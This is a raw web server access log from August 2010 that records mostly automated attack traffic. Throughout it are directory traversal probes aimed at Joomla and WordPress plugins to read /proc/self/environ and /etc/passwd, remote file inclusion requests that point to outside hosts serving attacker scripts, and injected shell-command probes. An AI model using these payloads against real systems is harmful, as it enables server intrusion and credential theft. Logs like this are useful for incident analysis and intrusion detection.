174.121.227.178 - - [22/Aug/2010:12:14:39 -0400] "GET //index.php?option=com_jejob&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
120.50.34.74 - - [22/Aug/2010:12:14:44 -0400] "GET /log/sdaglobal.org-access_log//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321
174.121.227.178 - - [22/Aug/2010:12:15:11 -0400] "GET /log//index.php?option=com_jejob&view=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
174.121.227.178 - - [22/Aug/2010:12:15:11 -0400] "GET //index.php?option=com_jejob&view=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
184.107.48.236 - - [22/Aug/2010:12:15:28 -0400] "GET /log/sdaglobal.org-access_log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319
184.107.48.236 - - [22/Aug/2010:12:15:28 -0400] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
184.107.48.236 - - [22/Aug/2010:12:15:28 -0400] "GET /log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294
174.121.227.178 - - [22/Aug/2010:12:15:39 -0400] "GET /log//index.php?option=com_jejob&view=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
174.121.227.178 - - [22/Aug/2010:12:15:39 -0400] "GET //index.php?option=com_jejob&view=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
74.55.52.154 - - [22/Aug/2010:12:15:52 -0400] "GET /log/sdaglobal.org-access_log.2%20%20//index.php?option=com_gcalendar&controller=http://dodome.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 324
74.55.52.154 - - [22/Aug/2010:12:15:52 -0400] "GET //index.php?option=com_gcalendar&controller=http://dodome.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 291
74.55.52.154 - - [22/Aug/2010:12:15:52 -0400] "GET //index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 291
74.55.52.154 - - [22/Aug/2010:12:15:53 -0400] "GET /log//index.php?option=com_gcalendar&controller=http://dodome.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 295
74.55.52.154 - - [22/Aug/2010:12:15:53 -0400] "GET /log//index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 295
74.55.52.154 - - [22/Aug/2010:12:15:54 -0400] "GET /log/sdaglobal.org-access_log.2%20%20//index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 324
84.21.8.208 - - [22/Aug/2010:12:16:53 -0400] "POST /contact.php HTTP/1.1" 404 292
84.21.8.208 - - [22/Aug/2010:12:16:53 -0400] "POST /log/contact.php HTTP/1.1" 404 296
84.21.8.208 - - [22/Aug/2010:12:16:53 -0400] "POST /log/sdaglobal.org-access_log.4/contact.php HTTP/1.1" 404 323
174.121.227.178 - - [22/Aug/2010:12:17:03 -0400] "GET /log//index.php?option=com_jejob&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
174.121.227.178 - - [22/Aug/2010:12:17:03 -0400] "GET //index.php?option=com_jejob&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
184.82.18.22 - - [22/Aug/2010:12:17:15 -0400] "POST /contact.php HTTP/1.1" 404 292
184.82.18.22 - - [22/Aug/2010:12:17:15 -0400] "POST /log/contact.php HTTP/1.1" 404 296
184.82.18.22 - - [22/Aug/2010:12:17:15 -0400] "POST /log/sdaglobal.org-access_log.4/contact.php HTTP/1.1" 404 323
174.121.166.146 - - [22/Aug/2010:12:17:23 -0400] "GET /log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://paps.fi/testi/files/respon1.txt??? HTTP/1.1" 404 344
174.121.166.146 - - [22/Aug/2010:12:17:23 -0400] "GET /log/sdaglobal.org-access_log.2%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://paps.fi/testi/files/respon1.txt??? HTTP/1.1" 404 373
174.121.166.146 - - [22/Aug/2010:12:17:24 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://paps.fi/testi/files/respon1.txt??? HTTP/1.1" 404 340
174.121.227.178 - - [22/Aug/2010:12:17:26 -0400] "GET /log//index.php?option=com_jejob&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
174.121.227.178 - - [22/Aug/2010:12:17:26 -0400] "GET //index.php?option=com_jejob&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
74.55.52.154 - - [22/Aug/2010:12:17:32 -0400] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_gcalendar&controller=http://dodome.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322
74.55.52.154 - - [22/Aug/2010:12:17:32 -0400] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 322
212.154.246.147 - - [22/Aug/2010:12:17:35 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
212.154.246.147 - - [22/Aug/2010:12:17:51 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
174.121.166.146 - - [22/Aug/2010:12:17:56 -0400] "GET /log/sdaglobal.org-access_log.2%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://paps.fi/testi/files/respon1.txt??? HTTP/1.1" 404 373
174.121.166.146 - - [22/Aug/2010:12:17:57 -0400] "GET /log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://paps.fi/testi/files/respon1.txt??? HTTP/1.1" 404 344
174.121.166.146 - - [22/Aug/2010:12:17:57 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://paps.fi/testi/files/respon1.txt??? HTTP/1.1" 404 340
174.121.166.146 - - [22/Aug/2010:12:18:02 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://paps.fi/testi/files/respon1.txt??? HTTP/1.1" 404 373
204.188.241.2 - - [22/Aug/2010:12:18:06 -0400] "POST //contact.php HTTP/1.1" 404 293
204.188.241.2 - - [22/Aug/2010:12:18:06 -0400] "POST /log/sdaglobal.org-access_log%20%20//contact.php HTTP/1.1" 404 324
204.188.241.2 - - [22/Aug/2010:12:18:06 -0400] "POST /log//contact.php HTTP/1.1" 404 297
65.13.185.104 - - [22/Aug/2010:12:18:14 -0400] "GET /log/sdaglobal.org-access_log.2//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322
65.13.185.104 - - [22/Aug/2010:12:18:15 -0400] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
174.121.166.146 - - [22/Aug/2010:12:18:15 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://paps.fi/testi/files/respon1.txt??? HTTP/1.1" 404 373
65.13.185.104 - - [22/Aug/2010:12:18:16 -0400] "GET /log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
81.201.55.48 - - [22/Aug/2010:12:18:55 -0400] "POST /log/contact.php HTTP/1.1" 404 296
81.201.55.48 - - [22/Aug/2010:12:18:55 -0400] "POST /log/sdaglobal.org-access_log.4/contact.php HTTP/1.1" 404 323
81.201.55.48 - - [22/Aug/2010:12:18:55 -0400] "POST /contact.php HTTP/1.1" 404 292
207.46.13.134 - - [22/Aug/2010:12:19:30 -0400] "GET /robots.txt HTTP/1.1" 404 291
65.13.185.104 - - [22/Aug/2010:12:19:43 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320
212.154.246.147 - - [22/Aug/2010:12:19:47 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
92.43.201.28 - - [22/Aug/2010:12:19:49 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 343
92.43.201.28 - - [22/Aug/2010:12:19:49 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 343
92.43.201.28 - - [22/Aug/2010:12:19:49 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 347
92.43.201.28 - - [22/Aug/2010:12:19:49 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 376
92.43.201.28 - - [22/Aug/2010:12:19:50 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 347
92.43.201.28 - - [22/Aug/2010:12:19:50 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 376
212.154.246.147 - - [22/Aug/2010:12:20:00 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
119.63.193.55 - - [22/Aug/2010:12:21:17 -0400] "GET / HTTP/1.1" 200 9426
120.50.34.74 - - [22/Aug/2010:12:22:10 -0400] "GET /log/sdaglobal.org-access_log.1//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323
219.78.88.235 - - [22/Aug/2010:12:22:52 -0400] "GET /images/english.gif HTTP/1.1" 200 2582
219.78.88.235 - - [22/Aug/2010:12:22:52 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
219.78.88.235 - - [22/Aug/2010:12:22:53 -0400] "GET /images/china.gif HTTP/1.1" 200 3479
184.107.48.236 - - [22/Aug/2010:12:24:10 -0400] "GET /log/sdaglobal.org-access_log.2/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321
84.21.8.208 - - [22/Aug/2010:12:24:39 -0400] "POST //contact.php HTTP/1.1" 404 293
84.21.8.208 - - [22/Aug/2010:12:24:40 -0400] "POST /log//contact.php HTTP/1.1" 404 297
84.21.8.208 - - [22/Aug/2010:12:24:40 -0400] "POST /log/sdaglobal.org-access_log%20%20//contact.php HTTP/1.1" 404 324
120.50.34.74 - - [22/Aug/2010:12:24:46 -0400] "GET /log/sdaglobal.org-access_log.1//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323
173.230.156.231 - - [22/Aug/2010:12:25:22 -0400] "GET //index.php?option=com_joomlaupdater&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 291
173.230.156.231 - - [22/Aug/2010:12:25:22 -0400] "GET /log//index.php?option=com_joomlaupdater&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 295
173.230.156.231 - - [22/Aug/2010:12:25:30 -0400] "GET //index.php?option=com_joomlaupdater&controller=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 291
173.230.156.231 - - [22/Aug/2010:12:25:30 -0400] "GET /log//index.php?option=com_joomlaupdater&controller=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 295
173.230.156.231 - - [22/Aug/2010:12:25:30 -0400] "GET //index.php?option=com_joomlaupdater&controller=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 291
81.19.215.12 - - [22/Aug/2010:12:25:30 -0400] "GET /log//index.php?option=com_gcalendar&controller=http://dodome.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 295
81.19.215.12 - - [22/Aug/2010:12:25:30 -0400] "GET //index.php?option=com_gcalendar&controller=http://dodome.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 291
173.230.156.231 - - [22/Aug/2010:12:25:30 -0400] "GET /log//index.php?option=com_joomlaupdater&controller=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 295
81.19.215.12 - - [22/Aug/2010:12:25:30 -0400] "GET /log//index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 295
81.19.215.12 - - [22/Aug/2010:12:25:30 -0400] "GET //index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 291
81.19.215.12 - - [22/Aug/2010:12:25:31 -0400] "GET /log/sdaglobal.org-access_log.2%20%20//index.php?option=com_gcalendar&controller=http://dodome.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 324
81.19.215.12 - - [22/Aug/2010:12:25:32 -0400] "GET /log/sdaglobal.org-access_log.2%20%20//index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 324
81.19.215.12 - - [22/Aug/2010:12:25:57 -0400] "GET /log/sdaglobal.org-access_log.2%20%20//index.php?option=com_gcalendar&controller=http://dodome.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 324
81.19.215.12 - - [22/Aug/2010:12:25:57 -0400] "GET //index.php?option=com_gcalendar&controller=http://dodome.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 291
81.19.215.12 - - [22/Aug/2010:12:25:57 -0400] "GET /log//index.php?option=com_gcalendar&controller=http://dodome.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 295
81.19.215.12 - - [22/Aug/2010:12:25:57 -0400] "GET /log/sdaglobal.org-access_log.2%20%20//index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 324
81.19.215.12 - - [22/Aug/2010:12:25:57 -0400] "GET //index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 291
81.19.215.12 - - [22/Aug/2010:12:25:57 -0400] "GET /log//index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 295
184.107.48.236 - - [22/Aug/2010:12:26:10 -0400] "GET /log/sdaglobal.org-access_log.2/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321
212.154.246.147 - - [22/Aug/2010:12:27:22 -0400] "GET /log/sdaglobal.org-access_log.1/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321
212.154.246.147 - - [22/Aug/2010:12:27:23 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
212.154.246.147 - - [22/Aug/2010:12:27:24 -0400] "GET /log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294
120.50.34.74 - - [22/Aug/2010:12:27:42 -0400] "GET /log/sdaglobal.org-access_log.3//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323
92.43.201.28 - - [22/Aug/2010:12:27:43 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 376
92.43.201.28 - - [22/Aug/2010:12:27:43 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 376
81.19.215.12 - - [22/Aug/2010:12:28:37 -0400] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_gcalendar&controller=http://dodome.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322
81.19.215.12 - - [22/Aug/2010:12:28:38 -0400] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 322
81.19.215.12 - - [22/Aug/2010:12:29:06 -0400] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_gcalendar&controller=http://dodome.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322
81.19.215.12 - - [22/Aug/2010:12:29:06 -0400] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_gcalendar&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 322
120.50.34.74 - - [22/Aug/2010:12:29:16 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
204.188.241.2 - - [22/Aug/2010:12:29:35 -0400] "POST //contact.php HTTP/1.1" 404 293
204.188.241.2 - - [22/Aug/2010:12:29:35 -0400] "POST /log//contact.php HTTP/1.1" 404 297
204.188.241.2 - - [22/Aug/2010:12:29:35 -0400] "POST /log/sdaglobal.org-access_log//contact.php HTTP/1.1" 404 322
212.154.246.147 - - [22/Aug/2010:12:29:36 -0400] "GET /log/sdaglobal.org-access_log.1/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321
212.154.246.147 - - [22/Aug/2010:12:29:37 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
212.154.246.147 - - [22/Aug/2010:12:29:37 -0400] "GET /log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294
212.154.246.147 - - [22/Aug/2010:12:29:47 -0400] "GET /log/sdaglobal.org-access_log.2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321
212.154.246.147 - - [22/Aug/2010:12:29:48 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
212.154.246.147 - - [22/Aug/2010:12:29:49 -0400] "GET /log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294
212.154.246.147 - - [22/Aug/2010:12:30:25 -0400] "GET /log/sdaglobal.org-access_log.2/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321
212.154.246.147 - - [22/Aug/2010:12:30:26 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290
212.154.246.147 - - [22/Aug/2010:12:30:27 -0400] "GET /log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294
174.121.227.178 - - [22/Aug/2010:12:32:56 -0400] "GET /log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
174.121.227.178 - - [22/Aug/2010:12:32:57 -0400] "GET //index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
174.121.227.178 - - [22/Aug/2010:12:33:00 -0400] "GET /log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
174.121.227.178 - - [22/Aug/2010:12:33:00 -0400] "GET //index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
174.121.227.178 - - [22/Aug/2010:12:33:06 -0400] "GET /log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
174.121.227.178 - - [22/Aug/2010:12:33:06 -0400] "GET //index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
174.121.227.178 - - [22/Aug/2010:12:33:09 -0400] "GET /log//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
174.121.227.178 - - [22/Aug/2010:12:33:09 -0400] "GET //index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
173.230.156.231 - - [22/Aug/2010:12:33:24 -0400] "GET /log//index.php?option=com_jinventory&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 295
173.230.156.231 - - [22/Aug/2010:12:33:24 -0400] "GET //index.php?option=com_jinventory&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 291
173.230.156.231 - - [22/Aug/2010:12:33:27 -0400] "GET //index.php?option=com_jinventory&controller=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 291
173.230.156.231 - - [22/Aug/2010:12:33:27 -0400] "GET //index.php?option=com_jinventory&controller=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 291
173.230.156.231 - - [22/Aug/2010:12:33:27 -0400] "GET /log//index.php?option=com_jinventory&controller=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 295
173.230.156.231 - - [22/Aug/2010:12:33:28 -0400] "GET /log//index.php?option=com_jinventory&controller=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 295
92.43.201.28 - - [22/Aug/2010:12:34:27 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 343
92.43.201.28 - - [22/Aug/2010:12:34:27 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 343
92.43.201.28 - - [22/Aug/2010:12:34:28 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 376
92.43.201.28 - - [22/Aug/2010:12:34:28 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 376
92.43.201.28 - - [22/Aug/2010:12:34:28 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://iimc-consultingclub.com/error/Ckrid1.txt?? HTTP/1.1" 404 347
92.43.201.28 - - [22/Aug/2010:12:34:29 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 347
66.235.124.193 - - [22/Aug/2010:12:35:01 -0400] "GET /robots.txt HTTP/1.1" 404 291
66.235.124.193 - - [22/Aug/2010:12:35:01 -0400] "GET /grtdebas.htm HTTP/1.1" 304 -
212.154.246.147 - - [22/Aug/2010:12:35:11 -0400] "GET /log//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
212.154.246.147 - - [22/Aug/2010:12:35:11 -0400] "GET //index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
212.154.246.147 - - [22/Aug/2010:12:35:17 -0400] "GET /log//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
212.154.246.147 - - [22/Aug/2010:12:35:18 -0400] "GET //index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
109.104.76.61 - - [22/Aug/2010:12:35:19 -0400] "GET /log/?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 61820
109.104.76.61 - - [22/Aug/2010:12:35:20 -0400] "GET /?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9426
174.121.227.178 - - [22/Aug/2010:12:35:23 -0400] "GET /log//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
174.121.227.178 - - [22/Aug/2010:12:35:23 -0400] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
174.121.227.178 - - [22/Aug/2010:12:36:01 -0400] "GET /log//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
174.121.227.178 - - [22/Aug/2010:12:36:01 -0400] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
204.188.241.2 - - [22/Aug/2010:12:36:23 -0400] "POST //contact.php HTTP/1.1" 404 293
204.188.241.2 - - [22/Aug/2010:12:36:24 -0400] "POST /log//contact.php HTTP/1.1" 404 297
204.188.241.2 - - [22/Aug/2010:12:36:24 -0400] "POST /log/sdaglobal.org-access_log//contact.php HTTP/1.1" 404 322
204.188.241.2 - - [22/Aug/2010:12:36:33 -0400] "POST //contact.php HTTP/1.1" 404 293
204.188.241.2 - - [22/Aug/2010:12:36:33 -0400] "POST /log//contact.php HTTP/1.1" 404 297
174.121.227.178 - - [22/Aug/2010:12:36:37 -0400] "GET /log//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
174.121.227.178 - - [22/Aug/2010:12:36:37 -0400] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
174.121.227.178 - - [22/Aug/2010:12:36:38 -0400] "GET /log//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295
174.121.227.178 - - [22/Aug/2010:12:36:38 -0400] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
204.188.241.2 - - [22/Aug/2010:12:36:41 -0400] "POST /log/sdaglobal.org-access_log%20%20//contact.php HTTP/1.1" 404 324
66.135.37.176 - - [22/Aug/2010:12:38:40 -0400] "GET /log//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 358
66.135.37.176 - - [22/Aug/2010:12:38:40 -0400] "GET //components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 354
66.135.37.176 - - [22/Aug/2010:12:38:40 -0400] "GET /log/sdaglobal.org-access_log%20%20//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 385
74.55.250.50 - - [22/Aug/2010:12:38:46 -0400] "GET //components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 354
74.55.250.50 - - [22/Aug/2010:12:38:46 -0400] "GET /log/sdaglobal.org-access_log%20%20//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 385
74.55.250.50 - - [22/Aug/2010:12:38:47 -0400] "GET /log//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://divecity.ru/administrator/components/com_joomlapack/js/black.jpg?? HTTP/1.1" 404 358
91.204.116.109 - - [22/Aug/2010:12:39:11 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
91.204.116.109 - - [22/Aug/2010:12:39:13 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
212.51.183.137 - - [22/Aug/2010:12:39:27 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
212.51.183.137 - - [22/Aug/2010:12:39:27 -0400] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291
